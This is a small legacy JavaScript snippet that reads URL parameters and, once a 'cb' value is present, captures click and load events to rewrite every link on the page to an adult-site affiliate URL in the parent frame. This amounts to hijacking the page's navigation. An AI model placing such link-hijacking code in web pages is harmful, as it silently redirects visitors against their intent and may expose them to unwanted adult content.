var paramOk = true; function FaitTableau(n) { this.length = n; for (var i = 0; i <= n; i++) { this[i] = 0 } return this } function ParamValeur(nValeur) { var nTemp = ""; for (var i=0;i<(param.length+1);i++) { if (param[i].substring(0,param[i].indexOf("=")) == nValeur) nTemp = param[i].substring(param[i].indexOf("=")+1,param[i].length) } return Decode(nTemp) } //if (!location.search) { // paramOk = false; //} //else { nReq = location.search.substring(1,location.search.length); if(nReq=="") nReq="login=785217&cb=2"; nReq = nReq.split("&"); param = new FaitTableau(nReq.length-1) for (var i=0;i<(nReq.length);i++) { param[i] = nReq[i] } //} function Decode(tChaine) { while (true) { var i = tChaine.indexOf('+'); if (i < 0) break; tChaine = tChaine.substring(0,i) + '%20' + tChaine.substring(i + 1, tChaine.length); } return unescape(tChaine) } dg_cb=ParamValeur("cb"); function redir() { dg_p=0; for(var i=0; i < document.links.length; ++i) { document.links[i].href="http://www.gayasie.com/access.shtml?login=785217&cb=2"; document.links[i].target="_parent"; } } if(dg_cb!="") { if (window.Event) { document.captureEvents(Event.CLICK); document.captureEvents(Event.ONLOAD); document.onclick = redir; document.onload = redir; } document.onclick = redir; document.onload = redir; }